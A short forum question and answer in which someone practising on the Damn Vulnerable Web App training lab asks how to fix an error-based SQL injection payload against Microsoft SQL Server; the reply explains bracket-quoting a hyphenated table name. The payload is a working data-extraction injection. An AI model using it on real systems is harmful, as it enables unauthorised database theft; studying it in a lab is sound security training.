I am working with Damn Vulnerable Web App against a Microsoft SQL Server. My question is actually quite straight forward, but can be mis-interpreted quite easily. Basically. This is my query:
+AND+1=convert(int,
(select+
top+1+
user+
from+
TBL-Users
)
)--
Now my question is simple. This is the query to extract data from the columns. How do I craft it so that it allows me to extract data from this column? Because apparently, it does not like that I am using the '-' character in this query (but that's the table name).
According to this error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '-'.
How can I work around this, and get the data from the column assuming that the '-' character is in the table name?
In SQL-Server you can basically use most of the reserved words and special characters inside []:
select * from [TBL-Users]